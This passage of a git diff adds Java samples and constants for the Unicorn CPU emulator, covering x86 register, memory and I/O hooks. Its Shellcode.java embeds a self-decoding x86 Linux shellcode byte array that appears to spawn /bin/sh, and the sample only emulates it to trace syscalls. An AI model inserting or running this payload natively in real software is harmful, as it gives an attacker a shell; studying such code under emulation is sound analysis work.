val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + // callback for tracing instruction + private static class MyBlockHook implements 
BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.printf(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.printf(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); + + Long eflags = (Long)u.reg_read(Unicorn.UC_X86_REG_EFLAGS); + System.out.printf(">>> --- EFLAGS is 0x%x\n", eflags.intValue()); + + // Uncomment below code to stop the emulation using uc_emu_stop() + // if (address == 0x1000009) + // u.emu_stop(); + } + } + + private static class MyWriteInvalidHook implements EventMemHook { + public boolean hook(Unicorn u, long address, int size, long value, Object user) { + System.out.printf(">>> Missing memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", + address, size, value); + // map this memory in with 2MB in size + u.mem_map(0xaaaa0000, 2 * 1024*1024, Unicorn.UC_PROT_ALL); + // return true to indicate we want to continue + return true; + } + } + + // callback for tracing instruction + private static class MyCode64Hook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + Long r_rip = (Long)u.reg_read(Unicorn.UC_X86_REG_RIP); + System.out.printf(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); + System.out.printf(">>> RIP is 0x%x\n", r_rip.longValue()); + + // Uncomment below code to stop the emulation using uc_emu_stop() + // if (address == 0x1000009) + // uc_emu_stop(handle); + } + } + + + private static class MyRead64Hook implements ReadHook { + public void hook(Unicorn u, long address, int size, Object user) { + System.out.printf(">>> Memory is being READ at 0x%x, data size = %d\n", address, size); + } + } + + private static class MyWrite64Hook implements WriteHook { + public void 
hook(Unicorn u, long address, int size, long value, Object user) { + System.out.printf(">>> Memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", + address, size, value); + } + } + + // callback for IN instruction (X86). + // this returns the data read from the port + private static class MyInHook implements InHook { + public int hook(Unicorn u, int port, int size, Object user_data) { + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + + System.out.printf("--- reading from port 0x%x, size: %d, address: 0x%x\n", port, size, r_eip.intValue()); + + switch(size) { + case 1: + // read 1 byte to AL + return 0xf1; + case 2: + // read 2 byte to AX + return 0xf2; + case 4: + // read 4 byte to EAX + return 0xf4; + } + return 0; + } + } + + // callback for OUT instruction (X86). + private static class MyOutHook implements OutHook { + public void hook(Unicorn u, int port, int size, int value, Object user) { + Long eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + Long tmp = null; + System.out.printf("--- writing to port 0x%x, size: %d, value: 0x%x, address: 0x%x\n", port, size, value, eip.intValue()); + + // confirm that value is indeed the value of AL/AX/EAX + switch(size) { + default: + return; // should never reach this + case 1: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_AL); + break; + case 2: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_AX); + break; + case 4: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + break; + } + + System.out.printf("--- register value = 0x%x\n", tmp.intValue()); + } + } + + static void test_i386() { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("Emulate i386 code\n"); + + // Initialize emulator in X86-32bit mode + Unicorn uc; + try { + uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + } catch (UnicornException uex) { + System.out.println("Failed on uc_open() with error returned: " + uex); + return; + } + + // map 2MB memory for this 
emulation + uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + try { + uc.mem_write(ADDRESS, X86_CODE32); + } catch (UnicornException uex) { + System.out.println("Failed to write emulation code to memory, quit!\n"); + return; + } + + // initialize machine registers + uc.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + uc.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + uc.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + uc.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error : %s\n", + uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + // read from memory + try { + byte[] tmp = uc.mem_read(ADDRESS, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, toInt(tmp)); + } catch (UnicornException ex) { + System.out.printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); + } + uc.close(); + } + + static void test_i386_inout() + { + Long r_eax = new Long(0x1234); // EAX register + Long r_ecx = new Long(0x6789); // ECX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code with IN/OUT instructions\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be 
emulated to memory + u.mem_write(ADDRESS, X86_CODE32_INOUT); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_EAX, r_eax); + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions + u.hook_add(new MyCodeHook(), 1, 0, null); + + // handle IN instruction + u.hook_add(new MyInHook(), null); + // handle OUT instruction + u.hook_add(new MyOutHook(), null); + + // emulate machine code in infinite time + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_eax = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + System.out.printf(">>> EAX = 0x%x\n", r_eax.intValue()); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + + u.close(); + } + + static void test_i386_jump() + { + System.out.print("===================================\n"); + System.out.print("Emulate i386 code with jump\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_JUMP); + + // tracing 1 basic block with customized callback + u.hook_add(new MyBlockHook(), ADDRESS, ADDRESS, null); + + // tracing 1 instruction at ADDRESS + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_JUMP.length, 0, 0); + + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + u.close(); + } + + // emulate code that loop forever + static void test_i386_loop() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that loop forever\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_LOOP); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // emulate machine code in 2 seconds, so we can quit even + // if the code loops + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.length, 2 * Unicorn.UC_SECOND_SCALE, 0); + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + // emulate code that read invalid memory + static void test_i386_invalid_mem_read() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that read from invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_MEM_READ); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); + } catch (UnicornException uex) { + int err = u.errno(); + System.out.printf("Failed on u.emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + // emulate code that read invalid memory + static void test_i386_invalid_mem_write() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that write to invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // intercept invalid memory events + u.hook_add(new MyWriteInvalidHook(), Unicorn.UC_HOOK_MEM_WRITE_UNMAPPED, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + // read from memory + byte tmp[] = u.mem_read(0xaaaaaaaa, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, toInt(tmp)); + + try { + u.mem_read(0xffffffaa, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xffffffaa, toInt(tmp)); + } catch (UnicornException uex) { + System.out.printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); + } + + u.close(); + } + + // emulate code that jump to invalid memory + static void test_i386_jump_invalid() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that jumps to invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_JMP_INVALID); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_JMP_INVALID.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + static void test_x86_64() + { + long rax = 0x71f3029efd49d41dL; + long rbx = 0xd87b45277f133ddbL; + long rcx = 0xab40d1ffd8afc461L; + long rdx = 0x919317b4a733f01L; + long rsi = 0x4c24e753a17ea358L; + long rdi = 0xe509a57d2571ce96L; + long r8 = 0xea5b108cc2b9ab1fL; + long r9 = 0x19ec097c8eb618c1L; + long r10 = 0xec45774f00c5f682L; + long r11 = 0xe17e9dbec8c074aaL; + long r12 = 0x80f86a8dc0f6d457L; + long r13 = 0x48288ca5671c5492L; + long r14 = 0x595f72f6e4017f6eL; + long r15 = 0x1efd97aea331ccccL; + + long rsp = ADDRESS + 0x200000; + + System.out.print("Emulate x86_64 code\n"); + + // Initialize emulator in X86-64bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE64); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_RSP, new Long(rsp)); + + u.reg_write(Unicorn.UC_X86_REG_RAX, new Long(rax)); + u.reg_write(Unicorn.UC_X86_REG_RBX, new Long(rbx)); + u.reg_write(Unicorn.UC_X86_REG_RCX, new Long(rcx)); + u.reg_write(Unicorn.UC_X86_REG_RDX, new Long(rdx)); + u.reg_write(Unicorn.UC_X86_REG_RSI, new Long(rsi)); + u.reg_write(Unicorn.UC_X86_REG_RDI, new Long(rdi)); + u.reg_write(Unicorn.UC_X86_REG_R8, new Long(r8)); + u.reg_write(Unicorn.UC_X86_REG_R9, new Long(r9)); + u.reg_write(Unicorn.UC_X86_REG_R10, new Long(r10)); + u.reg_write(Unicorn.UC_X86_REG_R11, new Long(r11)); + u.reg_write(Unicorn.UC_X86_REG_R12, new Long(r12)); + u.reg_write(Unicorn.UC_X86_REG_R13, new Long(r13)); + u.reg_write(Unicorn.UC_X86_REG_R14, new Long(r14)); + u.reg_write(Unicorn.UC_X86_REG_R15, new 
Long(r15)); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions in the range [ADDRESS, ADDRESS+20] + u.hook_add(new MyCode64Hook(), ADDRESS, ADDRESS+20, null); + + // tracing all memory WRITE access (with @begin > @end) + u.hook_add(new MyWrite64Hook(), 1, 0, null); + + // tracing all memory READ access (with @begin > @end) + u.hook_add(new MyRead64Hook(), 1, 0, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + X86_CODE64.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + Long r_rax = (Long)u.reg_read(Unicorn.UC_X86_REG_RAX); + Long r_rbx = (Long)u.reg_read(Unicorn.UC_X86_REG_RBX); + Long r_rcx = (Long)u.reg_read(Unicorn.UC_X86_REG_RCX); + Long r_rdx = (Long)u.reg_read(Unicorn.UC_X86_REG_RDX); + Long r_rsi = (Long)u.reg_read(Unicorn.UC_X86_REG_RSI); + Long r_rdi = (Long)u.reg_read(Unicorn.UC_X86_REG_RDI); + Long r_r8 = (Long)u.reg_read(Unicorn.UC_X86_REG_R8); + Long r_r9 = (Long)u.reg_read(Unicorn.UC_X86_REG_R9); + Long r_r10 = (Long)u.reg_read(Unicorn.UC_X86_REG_R10); + Long r_r11 = (Long)u.reg_read(Unicorn.UC_X86_REG_R11); + Long r_r12 = (Long)u.reg_read(Unicorn.UC_X86_REG_R12); + Long r_r13 = (Long)u.reg_read(Unicorn.UC_X86_REG_R13); + Long r_r14 = (Long)u.reg_read(Unicorn.UC_X86_REG_R14); + Long r_r15 = (Long)u.reg_read(Unicorn.UC_X86_REG_R15); + + System.out.printf(">>> RAX = 0x%x\n", r_rax.longValue()); + System.out.printf(">>> RBX = 0x%x\n", r_rbx.longValue()); + System.out.printf(">>> RCX = 0x%x\n", r_rcx.longValue()); + System.out.printf(">>> RDX = 0x%x\n", r_rdx.longValue()); + System.out.printf(">>> RSI = 0x%x\n", r_rsi.longValue()); + System.out.printf(">>> RDI = 0x%x\n", r_rdi.longValue()); + System.out.printf(">>> R8 = 0x%x\n", r_r8.longValue()); + System.out.printf(">>> R9 = 0x%x\n", r_r9.longValue()); + 
System.out.printf(">>> R10 = 0x%x\n", r_r10.longValue()); + System.out.printf(">>> R11 = 0x%x\n", r_r11.longValue()); + System.out.printf(">>> R12 = 0x%x\n", r_r12.longValue()); + System.out.printf(">>> R13 = 0x%x\n", r_r13.longValue()); + System.out.printf(">>> R14 = 0x%x\n", r_r14.longValue()); + System.out.printf(">>> R15 = 0x%x\n", r_r15.longValue()); + + u.close(); + } + + static void test_x86_16() + { + Long eax = new Long(7); + Long ebx = new Long(5); + Long esi = new Long(6); + + System.out.print("Emulate x86 16-bit code\n"); + + // Initialize emulator in X86-16bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_16); + + // map 8KB memory for this emulation + u.mem_map(0, 8 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(0, X86_CODE16); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_EAX, eax); + u.reg_write(Unicorn.UC_X86_REG_EBX, ebx); + u.reg_write(Unicorn.UC_X86_REG_ESI, esi); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(0, X86_CODE16.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + // read from memory + byte[] tmp = u.mem_read(11, 1); + System.out.printf(">>> Read 1 bytes from [0x%x] = 0x%x\n", 11, toInt(tmp)); + + u.close(); + } + + public static void main(String args[]) + { + if (args.length == 1) { + if (args[0].equals("-32")) { + test_i386(); + test_i386_inout(); + test_i386_jump(); + test_i386_loop(); + test_i386_invalid_mem_read(); + test_i386_invalid_mem_write(); + test_i386_jump_invalid(); + } + + if (args[0].equals("-64")) { + test_x86_64(); + } + + if (args[0].equals("-16")) { + test_x86_16(); + } + + // test memleak + if (args[0].equals("-0")) { + while(true) { + test_i386(); + // test_x86_64(); + } + } + } else { + System.out.print("Syntax: java Sample_x86 <-16|-32|-64>\n"); + } + + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java new file mode 100644 index 0000000..e2b1a6d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java @@ -0,0 +1,77 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Sample code to demonstrate how to register read/write API */ + +import unicorn.*; + +public class Sample_x86_mmr { + + static void test_x86_mmr() { + // Initialize emulator in X86-32bit mode + Unicorn uc; + try { + uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + } catch (UnicornException uex) { + System.out.println("Failed on uc_open() with error returned: " + uex); + return; + } + + // map 4k + uc.mem_map(0x400000, 0x1000, Unicorn.UC_PROT_ALL); + + X86_MMR ldtr1 = new X86_MMR(0x1111111122222222L, 0x33333333, 0x44444444, (short)0x5555); + X86_MMR ldtr2; + X86_MMR gdtr1 = new X86_MMR(0x6666666677777777L, 0x88888888, 0x99999999, (short)0xaaaa); + X86_MMR gdtr2, gdtr3, gdtr4; + + int eax; + + // initialize machine registers + + uc.reg_write(Unicorn.UC_X86_REG_LDTR, ldtr1); + uc.reg_write(Unicorn.UC_X86_REG_GDTR, gdtr1); + uc.reg_write(Unicorn.UC_X86_REG_EAX, new Long(0xdddddddd)); + + // read the registers back out + eax = (int)((Long)uc.reg_read(Unicorn.UC_X86_REG_EAX)).longValue(); + ldtr2 = (X86_MMR)uc.reg_read(Unicorn.UC_X86_REG_LDTR); + gdtr2 = (X86_MMR)uc.reg_read(Unicorn.UC_X86_REG_GDTR); + + System.out.printf(">>> EAX = 0x%x\n", eax); + + System.out.printf(">>> LDTR.base = 0x%x\n", ldtr2.base); + System.out.printf(">>> LDTR.limit = 0x%x\n", ldtr2.limit); + System.out.printf(">>> LDTR.flags = 0x%x\n", ldtr2.flags); + System.out.printf(">>> LDTR.selector = 0x%x\n\n", ldtr2.selector); + + System.out.printf(">>> GDTR.base = 0x%x\n", gdtr2.base); + System.out.printf(">>> GDTR.limit = 0x%x\n", gdtr2.limit); + + uc.close(); + } + + public static void main(String args[]) + { + test_x86_mmr(); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java new file mode 100644 index 0000000..48674a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java @@ -0,0 +1,161 @@ +/* + +Java bindings 
for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ + +/* Sample code to trace code with Linux code with syscall */ + +import unicorn.*; +import java.math.*; + +public class Shellcode { + + public static final byte[] X86_CODE32 = {-21,25,49,-64,49,-37,49,-46,49,-55,-80,4,-77,1,89,-78,5,-51,-128,49,-64,-80,1,49,-37,-51,-128,-24,-30,-1,-1,-1,104,101,108,108,111}; + public static final byte[] X86_CODE32_SELF = {-21,28,90,-119,-42,-117,2,102,61,-54,125,117,6,102,5,3,3,-119,2,-2,-62,61,65,65,65,65,117,-23,-1,-26,-24,-33,-1,-1,-1,49,-46,106,11,88,-103,82,104,47,47,115,104,104,47,98,105,110,-119,-29,82,83,-119,-31,-54,125,65,65,65,65,65,65,65,65}; + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + public static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user) { + + 
System.out.print(String.format("Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + System.out.print(String.format("*** EIP = %x ***: ", r_eip.intValue())); + + size = Math.min(16, size); + + byte[] tmp = u.mem_read(address, size); + for (int i = 0; i < tmp.length; i++) { + System.out.print(String.format("%x ", 0xff & tmp[i])); + } + System.out.print("\n"); + } + }; + + public static class MyInterruptHook implements InterruptHook { + public void hook(Unicorn u, int intno, Object user) { + Long r_ecx; + Long r_edx; + int size; + + // only handle Linux syscall + if (intno != 0x80) { + return; + } + + Long r_eax = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + + switch (r_eax.intValue()) { + default: + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip.intValue(), intno, r_eax.intValue())); + break; + case 1: // sys_exit + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, SYS_EXIT. quit!\n\n", r_eip.intValue(), intno)); + u.emu_stop(); + break; + case 4: // sys_write + // ECX = buffer address + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + + // EDX = buffer size + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + + // read the buffer in + size = (int)Math.min(256, r_edx); + + byte[] buffer = u.mem_read(r_ecx, size); + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, SYS_WRITE. 
buffer = 0x%x, size = %u, content = '%s'\n", + r_eip.intValue(), intno, r_ecx.intValue(), r_edx.intValue(), new String(buffer))); + break; + } + } + } + + static void test_i386() + { + Long r_esp = new Long(ADDRESS + 0x200000); // ESP register + + System.out.print("Emulate i386 code\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_SELF); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ESP, r_esp); + + // tracing all instructions by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // handle interrupt ourself + u.hook_add(new MyInterruptHook(), null); + + System.out.print("\n>>> Start tracing this Linux code\n"); + + // emulate machine code in infinite time + // u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 12); <--- emulate only 12 instructions + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 0); + + System.out.print("\n>>> Emulation done.\n"); + + u.close(); + } + + public static void main(String args[]) + { + if (args.length == 1) { + if ("-32".equals(args[0])) { + test_i386(); + } + } else { + System.out.print("Syntax: java Shellcode <-32|-64>\n"); + } + + } + +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java new file mode 100644 index 0000000..dc70de8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java @@ -0,0 +1,317 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface Arm64Const { + +// ARM64 registers + + public static final int UC_ARM64_REG_INVALID = 0; + public static final int UC_ARM64_REG_X29 = 1; + public static final int UC_ARM64_REG_X30 = 2; + public static final int UC_ARM64_REG_NZCV = 3; + public static final int UC_ARM64_REG_SP = 4; + public static final int UC_ARM64_REG_WSP = 5; + public static final int UC_ARM64_REG_WZR = 6; + public static final int UC_ARM64_REG_XZR = 7; + public static final int UC_ARM64_REG_B0 = 8; + public static final int UC_ARM64_REG_B1 = 9; + public static final int UC_ARM64_REG_B2 = 10; + public static final int UC_ARM64_REG_B3 = 11; + public static final int UC_ARM64_REG_B4 = 12; + public static final int UC_ARM64_REG_B5 = 13; + public static final int UC_ARM64_REG_B6 = 14; + public static final int UC_ARM64_REG_B7 = 15; + public static final int UC_ARM64_REG_B8 = 16; + public static final int UC_ARM64_REG_B9 = 17; + public static final int UC_ARM64_REG_B10 = 18; + public static final int UC_ARM64_REG_B11 = 19; + public static final int UC_ARM64_REG_B12 = 20; + public static final int UC_ARM64_REG_B13 = 21; + public static final int UC_ARM64_REG_B14 = 22; + public static final int UC_ARM64_REG_B15 = 23; + public static final int UC_ARM64_REG_B16 = 24; + public static final int UC_ARM64_REG_B17 = 25; + public static final int UC_ARM64_REG_B18 = 26; + public static final int 